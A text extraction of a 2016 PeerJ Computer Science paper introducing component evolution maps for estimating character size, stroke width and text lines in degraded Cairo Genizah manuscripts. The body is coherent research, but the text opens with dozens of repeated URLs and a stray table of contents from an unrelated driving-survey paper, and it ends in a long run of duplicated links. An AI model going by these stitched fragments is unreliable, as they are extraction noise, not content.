http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://www.eetimes.com/author.asp?section_id=36&doc_id=1322246 http://dx.doi.org/10.7717/peerj-cs.13 Auditory interfaces in automated driving: an international survey Introduction The development of automated driving systems Auditory displays Auditory systems in current vehicles: parking assistant and forward collision warning system `Augmented/spatial' sound system for fully automated driving The aim of the present survey study Methods Survey Configuration of CrowdFlower Analyses Ethics statement Results Number of respondents and respondent satisfaction Data filtering Analyses at the individual level Cross-national differences in opinion for feedback for takeover requests Analyses of textual comments Discussion Acknowledgements References work_yb2mzleh2rdpbgrztb2m5gw7fy ---- Evolution maps and applications Submitted 15 April 2015 Accepted 19 November 2015 Published 6 January 2016 Corresponding author Ofer Biller, billero@cs.bgu.ac.il Academic editor Pinar Duygulu Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.39 Copyright 2016 Biller et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Evolution maps and applications Ofer Biller1, Irina Rabaev1, Klara Kedem1, Its’hak Dinstein2 and Jihad J. El-Sana1 1 Department of Computer Science, Ben-Guion University of the Negev, Beer-Sheva, Israel 2 Electrical and Computer Engineering Department, Ben-Guion University of the Negev, Beer-Sheva, Israel ABSTRACT Common tasks in document analysis, such as binarization, line extraction etc., are still considered difficult for highly degraded text documents. Having reliable fundamental information regarding the characters of the document, such as the distribution of character dimensions and stroke width, can significantly improve the performance of these tasks. We introduce a novel perspective of the image data which maps the evolution of connected components along the change in gray scale threshold. The maps reveal significant information about the sets of elements in the document, such as characters, noise, stains, and words. The information is further employed to improve state of the art binarization algorithm, and achieve automat- ically character size estimation, line extraction, stroke width estimation, and feature distribution analysis, all of which are hard tasks for highly degraded documents. Subjects Computer Vision, Digital Libraries Keywords Text document analysis, Historical documents, Degraded documents, Connected component analysis INTRODUCTION In recent years there has been a growing effort to digitize historical documents. Due to advanced technology, a high quality acquisition of large collections of documents became practical, saving them from physical decay. Many algorithms are being developed in order to extract information out of these documents, which are too numerous to analyze manually. However, some of these documents are severely degraded, and therefore do not provide acceptable performance when processed using common methods. In our work, we provide a novel perspective on text documents which reveals key information about the various elements of the document such as letters, connected letters, noise, and stains. The extracted information can be used by higher level algorithms to significantly improve their performance. Various algorithms such as binarization, segmentation, word spotting, and recognition often require preliminary information such as character dimensions, stroke width, and noise characteristics of the input document. When dealing with severely degraded documents, this information is essential but is hard to obtain automatically. Less degraded documents parameters, such as stroke width and character size, are often obtained with relative accuracy by using a binarized version of the document (Roy et al., 2009; Wen & Ding, 2004; Raju, Pati & Ramakrishnan, 2004a). The binarization of degraded documents, however, is not reliable as it may introduce How to cite this article Biller et al. (2016), Evolution maps and applications. PeerJ Comput. Sci. 2:e39; DOI 10.7717/peerj-cs.39 mailto:billero@cs.bgu.ac.il https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.39 http://dx.doi.org/10.7717/peerj-cs.39 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 noise, falsely merged components, and other artifacts. For many algorithms, information regarding character dimensions is often expected to be provided by the user or determined in an ad-hoc manner (New et al., 2006; Bar-Yosef et al., 2007). Our method copes with severe degradations and non-uniform backgrounds. In this paper, we introduce the component evolution maps, and demonstrate some of their applications. We use these maps to estimate letter dimensions and stroke width in degraded documents. We then utilize this information to improve state-of-the-art bina- rization, line segmentation, and characterizing feature behavior in a document collection. For a given property of the connected components in a document, the evolution maps demonstrate the evolution of the histogram of the property, along with the change in the intensity threshold. To simplify the discussion, we start explaining the evolution map of the component’s width property. For example, Fig. 1 shows the distribution of the width of the connected components for each possible intensity threshold. The y-axis represents the intensity level, the x-axis represents width, and the z-axis (color) represents the density of the components for each width in the given threshold: warm (red, orange, yellow, etc.)—high density, cold (blue, cyan, etc.)—low (this is the color coding of all the maps depicted in the figures in the paper). Since the map represents a text document, we expect to see high density in the range of character width and within the range of intensity thresholds that separates the characters from the background. The histogram in Fig. 1 shows a blob centered around a width of 28 pixels, ranging over gray levels approximately from 40 to 100. This blob represents the characters in the document. The noise, on the other hand, concentrates along the y-axis, and is depicted as a large number of low width connected components in a wide range of gray scale thresholds. In our research we deal with severely degraded documents, where state-of-the-art document analysis algorithms, such as binarization and line extraction, provide poor results. A good example of such text documents are those from the Cairo Genizah. The Cairo Genizah is a collection of documents, most of them in handwritten Hebrew square letters, which where hidden in an attic of a synagogue in Cairo, Egypt for several hundreds of years. The Genizah collection contains hundreds of thousands of documents dated starting from the ninth century. The documents are characterized by different handwriting styles, document and letter sizes, and materials. Most documents are only textual, each document contains a single writing style with no titles, and many of them are severely degraded. The main motivation in this research is to provide a solid starting point for processing severely degraded historical documents. In the rest of this paper we briefly overview related work, then describe in detail the component evolution maps, their construction and initial analysis (‘Evolution maps’). In ‘Applications’ we demonstrate several applications for component evolution maps. Finally, in ‘Summary,’ we conclude our work and draw directions for future research. RELATED WORK Connected component analysis has attracted the interest of researchers, and intensive research was performed on document layout segmentation and text separation for Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 2/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 1 A document image, and the distribution of connected components along their width prop- erty (x-axis), for each possible gray scale threshold (y-axis). The z-axis is expressed by color where warm (cold) colors represent high (low) density of components. Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 3/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 binarized document images (Jain & Zhong, 1996; Raju, Pati & Ramakrishnan, 2004b; Zagoris & Papamarko, 2010; Bukhari et al., 2010). Pikaz & Averbuch (1996) selected a threshold for text document by scanning the entire gray scale range, thresholding the image with each value, looking for the widest sub range of gray scale for which the number of the connected components remains stable. This method may be viewed as a special case of our approach. The component tree is a graph representation computed from the cross-section decomposition of the gray levels of the image (Mosorov & Kowalski, 2002), and uses connected components of cross-sections at gray level of the image to assemble different perspectives of the image data. The component tree applies operators on a single component level for image segmentation (De Carvalho et al., 2010) and for document binarization (Naegel & Wendling, 2010). Similarly, the Maximally Stable Extremal Regions (MSER) descriptor (Pajdla et al., 2002) finds extremal regions which maximize stability over threshold change, and is used mostly for object recognition. Most of these works analyze the change of thresholds in order to achieve local information such as local adaptive binarization, segmenting or locating objects in an image. In our work, we map connected component information for a range of different thresholds over the whole document in order to extract global information about the document and its elements. EVOLUTION MAPS We offer a novel perspective of the image data which reflects the evolution of connected components along the change in gray scale threshold. We term it as Component Evolution Maps (CEM). CEM brings to the surface underlying information about the sets of elements (e.g., letters, noise, connected letters) in the document image. Below we discuss in detail the construction of the evolution maps followed by their analysis. Definition of the evolution map The evolution map is a function of the intensity (I) and a property (P) of the connected components of the image into the occurrence level of this property in the image, i.e., map : I × P −→ R, where I is the intensity, P is an image property, and R is the occurrence (detailed below). For example, the width CEM, map(g,w), is the number of connected components of width w in pixels, when thresholding the image at intensity g. To simplify the discussion, we refer in this section only to the width CEM. The CEM provides an intuitive visualization tool to analyze the distribution of an image property. Figure 2 represents the width CEM for a text document image, where ‘hot’ colors represent high density of components. The horizontal cross-section at gray scale value g (y-axis) represents the histogram of the components’ widths in the image binarized using g as a threshold. Figure 2 shows three cross-sections at different intensity thresholds, and the corresponding binary images. In Fig. 3 we illustrate a cross-section as histogram of component width for a specific threshold, and the corresponding components in the document for two ranges of width (see the squares on the graph). Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 4/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 2 Horizontal cross-section of the width CEM and the corresponding binary images. Construction of the evolution map We construct the evolution map in a straightforward manner by thresholding the image over gray levels, and counting the number of resulting connected components for each width in the binary image. Since noise usually produces a vast number of small components and skews the histogram, we accumulate the relative total area of the components, which is defined as the area of the components normalized by the size of the whole image. This value is less sensitive to noise than component count, as shown in Fig. 4. As seen, the red blob on the top illustration emphasizes the noise, and the bottom illustration highlights the width of the sought elements. We store both the values count and the relative total area, and use each of them in different applications as detailed below. We smooth the CEM using a 2d Gaussian kernel to reduce the influence of local irregularities. Constructing the CEM, for one or few properties, is relatively straight forward and fast. For example, computing the CEMs of 5 properties for a document of resolution 1,600 × 2,300 took about 4.5 s on a standard desktop. Analysis of the CEM Some sets of elements in the gray scale documents (noise, characters, connected characters, etc.) have values of the mapped property which are distributed within a given range. Sets which are dominant in the document will form a blob of local maximum on the map. The Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 5/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 3 A horizontal cross-section of the densities in the width CEM at one gray level value. The squares on the graph depict the most popular widths for this intensity value. The images of components corresponding to the squares are pointed to by the arrows. characteristics of the local maximum and its surroundings describe attributes of the set of objects. Due to the statistical nature of the map, it tends to be robust against various defects of the image such as blurriness, local degradations and deformations. Figure 5 shows a document with its width CEM. Images a–e show the set of elements in the original image corresponding to the blobs a–e in the CEM. Blob a represents a set of noise stains in the document, which appear on relatively high range of threshold values and low width values (indicating small components). The dominance of blob b is supported by the existence of single character elements that occupy a substantial area of the image. Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 6/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 4 (A) displays the count of components per threshold and width, and (B) shows the relative total area of components per threshold and width. Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 7/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 5 A document image with its components according to the width evolution map. The images (A, B, C, D, E), display the components represented by each of the blobs, marked on the map by (A, B, C, D, E). The blobs c, d, and e, are at high width values and represent objects of two, three, and four connected letters, respectively. To extract the information found in the CEM, we look for the main blobs in the map, and model each of them by an anisotropic Gaussian. First, to determine the top blob centroids, we use a sweeping plane that moves downward along the z-axis. As the plane descends, it encounters the peaks of the blobs, one by one. Neighboring blobs expand until they touch each other, or reach a low value below a predefined threshold. We use the data of the peaks and their immediate neighborhood to create an anisotropic Gaussian model for each blob. We fit a quadratic surface to the log of the data from the map using the least squares method. We obtain the Gaussian characteristics using the coefficients of the fitted quadratic surface. Given a blob on the map and it’s Gaussian modeling, we can obtain an estimation for the distribution of the property values for the elements represented by the blob. In the width example, we receive distribution of the width of elements represented by each blob. In order to receive some hard limits on the values of the property values for the elements in the group, we should apply some threshold on the given distribution (e.g., 3 times the standard deviation). Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 8/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 6 The original width CEM (A), and its modeling by anisotropic Gaussians (B). Gaussian modeling was validated as suitable for the CEM blobs by examining the data and verifying that the blob distribution is very close to normal distribution. Using Gaussians to model the blobs provides a concise and simplified representation, and handles blob intersection appropriately. It also provides the probability that an element belongs to the set represented by a certain blob. Using Gaussian mixture model was examined as an alternative option, but was found this to be less effective since the mixture model, using expectation maximization, tends to capture small components, while we prefer to ignore small components and model the leading salient blobs more accurately. Figure 6 shows a width CEM and its simplified modeling using the topmost Gaussians. APPLICATIONS In this section we demonstrate some applications of CEMs for several document analysis tasks. We robustly estimate the character dimensions and stroke width on degraded documents. This information is then used by many document analysis algorithms to improve their performance and reduce the need for manual adjustments of predefined parameters. We demonstrate utilization of this information to improve state of the art binarization method and simplify line segmentation of degraded documents. Finally, we show how the CEMs is used for exploring feature behavior in text documents. In order to evaluate the performance of these tasks we had to manually generate ground truth for each task (character dimensions, line segmentation, and stroke width). For each task, we randomly selected a subset of the documents from the collection and generated the ground truth relevant for the task. Estimation of character dimensions One of the salient elements in a CEM of a text document is the blob which represents the documents’ characters. To determine the blob that represents the document’s characters, we consider the top blobs and grade them according to the following features. We define Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 9/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 the components of a blob B as as the set of connected components corresponding to the points (g,w) of B, and the cardinality of the blob B as the number of connected components represented by B. Let p be the percentage of the image area occupied by all the components in the blob B, and let n denote the total number of components in B. Equation (1) formulates the score of of the blob B. score = (a · p) × 1 1 + exp(−c1 · (n − c2)) . (1) The exponential term in the denominator, parametrized by the given constants c1 and c2, suppresses the score of blobs with small number of components. The blobs with the highest score from both width and height CEMs represent the width and height of the letters in the input image. We also take into account the agreement level between the selected blobs from the width and the height CEMs– the two blobs should have a similar mean and standard deviation on the y-axis (intensity) projection. The same experiment was conducted also for other properties, such as the component’s diagonal and the projection of the component on its main principal axis. These maps provide correct estimates of the character dimensions in most cases, but are less accurate than the estimate obtained by width and height evolution maps. We applied our method on a collection of digitized historical documents from the Cairo Genizah. We ran our algorithm on a set of hundred documents (selected randomly) with various degradation levels, resolutions and character dimensions. We created width and height CEMs for each document, and estimated the width and height ranges of the characters in each document. For these documents, we have created ground truth (using Biller et al., 2013) which includes bounding boxes of the letters. To measure the accuracy of our results, we calculated the precision, recall, and f-measure of our estimate with respect to the ground truth. Figure 8 shows the width CEM for a specific document. Displayed in black over it is a histogram of the ground truth widths. Our estimate of character width is marked by a white rectangle. We calculated the recall as the percentage of letters from the ground truth which fit in our width estimate. The precision is calculated as the ratio between the overlap of our width estimate with the ground truth and the range of our width estimate. Our method achieves accuracy of 87.8% (f-measure) with respect to the provided ground truth. Improving binarization methods In this section, we demonstrate improving the results of a binarization algorithm by using CEM to estimate character dimension. We use the winning algorithm in the H-DIBCO-2010 binarization contest (Pratikakis, Gatos & Ntirogiannis, 2010) proposed by Bar-Yosef et al. (2007). This binarization algorithm is based on the sliding window approach. The window size is configurable, and the authors recommend it to be around one and a half times the letter size. First we ran the binarization algorithm with a default window size (Fig. 7A). Then, we ran the same binarization algorithm using a window size of one and a half times the maximum of the width and height of the characters in the Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 10/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 7 Utilizing our estimation to improve binarization algorithm. (A) Binarization using default window size. (B) Binarization with optimized window size using the output of the CEM. (C) Result after filtering out-of-range components, using the estimate of character dimension, given by the CEM. Figure 8 The width CEM of a document’s image. Displayed in black on the CEM is the histogram of the ground truth of widths for the letters (the height of the black line represents the count). The white rectangle shows the estimate of the width range of the characters, made by our algorithm. Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 11/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 9 Line detection results of the algorithm. The elements that belong to the same line have the same color. The segmentation borders are shown as blue curves. document obtained by CEM (Fig. 7B). As an additional improvement of the binarization, we filter out all components of the binarized image which substantially exceed the range of character dimensions (Fig. 7C). We applied our method on seventy degraded documents from the Genizah collection, and observed a substantial improvement in the quality of the results compared with the Bar-Yosef algorithm with default parameters. To quantify the improvement we randomly selected five documents, manually generated a ground truth of binarization for each, and measured the performance of the two binarization methods against the ground truth. The proposed method achieved an average F-Measure of 79.9% (with average percision of 73.1% and average recall of 88.6%) while the original algorithm achived 70.3% (with average percision of 60.1% and average recall of 85.2%). Line segmentation of degraded documents In this section, we demonstrate utilizing CEM for text line detection in gray scale images of highly degraded historical documents. Using the information obtained from the CEM, we identify components which are likely to be characters of the documents. We take into account their width, height, and range of thresholds in which they are received. The set of identified elements does not have to include all the characters present in the document. Nevertheless, the identified elements represent most of the characters in the document, which allows detecting text lines in the degraded document, as described below. The detected potential characters are accumulated into lines using a sweeping line approach. A vertical sweeping line moves across the image in the direction of writing. When the sweeping line encounters an element, the algorithm determines whether to assign this element to one of the already discovered text lines, or to initiate a new line. Full details of the algorithm can be found in Rabaev et al. (2013). The final result of the text line detection is illustrated in Fig. 9. Elements that belong to the same line have the same color. The segmentation borders are shown in blue. To evaluate the performance of the algorithm, we employed the evaluation strategy used in the ICDAR handwriting segmentation contest (Gatos, Stamatopoulos & Louloudis, 2011). Two values, detection rate (DR) and recognition accuracy (RA), are calculated. The detection rate and recognition accuracy are based on the number of matches between the Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 12/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 line regions detected by the algorithm and the line regions in the ground truth, and are calculated as follows: DR = o2o N , RA = o2o M , where N and M are the number of text lines in the ground truth and the number of text lines detected by the algorithm, respectively, and o2o is the number of one-to-one matches. A measure that combines detection rate and recognition accuracy is the performance metric FM: FM = 2 × DR × RA DR + RA . The algorithm was applied to 58 extremely degraded document from Cairo Genizah collection. The results averaged over these documents are DR = 0.8823, RA = 0.8466, and FM = 0.8610. Taking into consideration that the tested documents are torn, stained and highly damaged, the results are very encouraging. In addition, the presented method does not require any preprocessing step, e.g., noise reduction or text zone location. To test the applicability of the proposed approach to non Hebrew documents, we used Saint Gall and Parzival databases. The Saint Gall database (presented in Fischer et al. (2011) and Garz et al. (2012)) contains 60 pages of a Latin manuscript from the 9th century written by single writer. The Parzival database, described in Fischer et al. (2012), contains 47 pages of a German manuscript from the 13th century written by three writers. The results of applying our algorithms are DR = 0.9784, RA = 0.8633, and FM = 0.9142 on Saint Gall database, and DR = 0.8106, RA = 0.8652 , and FM = 0.8363 on Parzival database. (Garz et al. (2012) used slightly dierent evaluation criteria. Without getting into details, our result for the Saint Gall dataset using their evaluation criteria is line accuracy 0.9784, while the result of Garz et al. is 0.9797. As can be seen, the results are very similar). In addition, we have applied the algorithm of Asi, Saabni & El-Sana (2011) on the Cairo Genizah dataset. While the algorithm in Asi, Saabni & El-Sana (2011) had been reported to achieve excellent results for documents of reasonable quality, it gave meaningless results on our extremely degraded dataset. Stroke width estimation Another application for utilizing evolution maps is evaluation of the range of stroke width in degraded documents. Many binarization methods use the stroke width as part of the binarization process (e.g., Su, Lu & Tan, 2013; Liu & Srihari, 1997; Rivest-Hénault, Moghaddam & Cheriet, 2012; Badekas and Papamarkos, 2007; Ntirogiannis, Gatos & Pratikakis, 2009). In extremely degraded documents, calculating the stroke width is hard and is highly influenced by noise and stains. The stroke width evolution map provides a statistical and comprehensive overview of the range of stroke widths revealed by the range of intensity thresholds. To estimate the stroke width for a component, we first compute the component’s distance transform, starting from the boundary of the component. We compute the Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 13/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 10 Let a be the stroke width. The maximal values the distance transform of the component achieves are around a/2. The average therefore can be used as an estimate for a/4. average of the distance transform values inside the component and multiply it by four to receive an estimate for the average stroke width (see illustration in Fig. 10). A stroke width is consistent if it does not change much within the component. We compute a consistency factor for the stroke within of the component, using the standard deviation of the histogram of the component’s distance transform. For each component we multiply its area by the stroke width consistency factor, so components with consistent stroke width will have a higher weight. In the CEM, we depict for each stroke width and intensity the sum of the weighted component areas. We select the most salient blob on the map using techniques described earlier, and use the Gaussian fit of that blob as an estimate of the stroke width. In Fig. 11 we show an example document with its stroke width evolution map. In the map, the selected blob is marked with a white boundary. The estimated range of stroke widths is illustrated on the top left of the document using red lines. The left and rightmost lines are the range boundaries and the middle line shows the average stroke width detected. To evaluate this method, we took fifteen degraded historical documents from the Cairo Genizah and sampled the stroke width manually in several random characters in the document. Over 92.5% of the samples across the documents where within the range of the estimate. Analysis of feature distribution in documents In many applications of document analysis, one of the first steps is looking for suitable features. The evolution maps provide a convenient tool for exploring and visualizing the behavior of different features in a given document. Using the maps, one can explore each feature, the distribution of its values, and view the elements of the document corresponding to different value ranges of that feature. Based on the CEM, we developed an interactive tool which enables flexible generation and exploration of evolution maps per property, which we call the evolution map explorer. The user can interactively examine the maps, adjust the maps’ display by setting properties for each map, and explore the maps. The user defines an area on the CEM with the mouse Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 14/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 11 (A) A document and (B) its stroke width evolution map. The selected blob on the map (marked with a white border) is used to estimate the stroke width of letters in the document. The estimate is marked by red vertical lines over the document image. The leftmost and the rightmost lines are the range boundaries and the middle line shows the average stroke width detected. (see, e.g., the black rectangle in the CEM in Fig. 12), and the system marks on the image of the document the elements corresponding to the rectangle, and displays information about the selection, e.g., the range of intensities, range of property values, and the count of elements relevant for this selection. For example we picked a document and the feature “transition average.” Our tool created the evolution map, shown in Fig. 13. In this evolution map, the x axis represents the Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 15/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 12 A general overview of the application. The four presented evolution maps are the width, principal direction, height and transition number average. The rectangle in the height CEM corresponds to the letters in the document on the left of the figure, whose heights and intensities correspond to the values in the rectangle. average number of transitions from background to foreground for a connected component (averaging over the rows and columns of the component). The figure shows, for each selected rectangle on the CEM, the document and the elements corresponding to this rectangle. The leftmost rectangle represents noise elements which have average transition values around 1. The middle rectangle represents sets of characters with average transition values ranging from 2.9 to 4.4. The rightmost rectangle represents elements including more than one connected character with average transition values from 6.9 to 7.8. One can observe on the CEM (Fig. 13) a number of peaks which distinguish between characters with high average transition count and low one. By selecting different rectangles within this area, the user can explore the distribution of the different letters corresponding to the ex- amined feature, and estimate the feature’s ability to discriminate between different letters. SUMMARY In this work we introduced component evolution map which maps the evolution of a property of the connected components along the change in gray scale intensity level. We have demonstrated the contribution and potential of CEM in several tasks: estimating letter dimensions, improving a state of the art binarization algorithm, performing Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 16/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.39 Figure 13 The evolution map of transition average for a document. Three selections of peek ranges (marked by black rectangles) in the evolution map, for each selection the elements corresponding to the selection are marked over the document. The leftmost range include transition values around 1, the middle selection contains transition values from 2.9 to 4.4, and the rightmost values between 6.9 to 7.8. line segmentation in degraded documents, stroke width estimation, and analysis of feature distribution in text documents. This method is applicable for a wide range of text documents, and is especially capable of dealing with highly degraded and noisy documents. We see in the CEM method potential for contribution in different directions in the document analysis field. We plan to continue looking for different ways to exploit the information gained by the CEMS, and also applying evolution maps on additional features. Among the uses we plan to examine in the usage of the maps as descriptor of a document for classification by writer or by origin manuscript (finding fragments of the manuscript). Furthermore, we plan to deal with limitations we took in this work such as regarding more than one writing style in a page. Another interesting direction we plan to investigate is using the maps for extracting automatically the degradation level of the document. The documents used in our experiments are accessible via the Genizah project site (http: //www.genizah.org/). To receive the ground truth data, please contact the authors by email. ACKNOWLEDGEMENTS This research was supported in part by the DFG-Trilateral Grant no. 8716. We thank Prof. Uri Ehrlich and Uri Safrai from the Goldstein-Goren Department of Jewish Thought, Ben-Gurion University of the Negev, for their assistance in generating the ground truth. Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 17/20 https://peerj.com/computer-science/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://www.genizah.org/ http://dx.doi.org/10.7717/peerj-cs.39 ADDITIONAL INFORMATION AND DECLARATIONS Funding This project was funded by the German Research Foundation under contract FI 1494/3-2. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: German Research Foundation: FI 1494/3-2. Competing Interests Klara Kedem is an Academic Editor for PeerJ Computer Science. Author Contributions • Ofer Biller conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • Irina Rabaev conceived and designed the experiments, performed the experiments, performed the computation work. • Klara Kedem conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • Its’hak Dinstein and Jihad J. El-Sana conceived and designed the experiments, analyzed the data, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The ground truth transcription for a set of document from the Genizah collection: Named by catalog number, formated by WebGT, and detailed at http://ieeexplore.ieee. org/xpl/articleDetails.jsp?arnumber=6628633. The data can be found at: http://www.cs.bgu.ac.il/∼billero/GenizahDocumentsAnnotationData.zip. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.39#supplemental-information. REFERENCES Asi A, Saabni R, El-Sana J. 2011. Text line segmentation for gray scale historical document images. In: Proceedings of the 2011 workshop on historical document imaging and processing. New York: ACM, 120–126. Available at http://dl.acm.org/citation.cfm?id=2037362. Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 18/20 https://peerj.com/computer-science/ http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 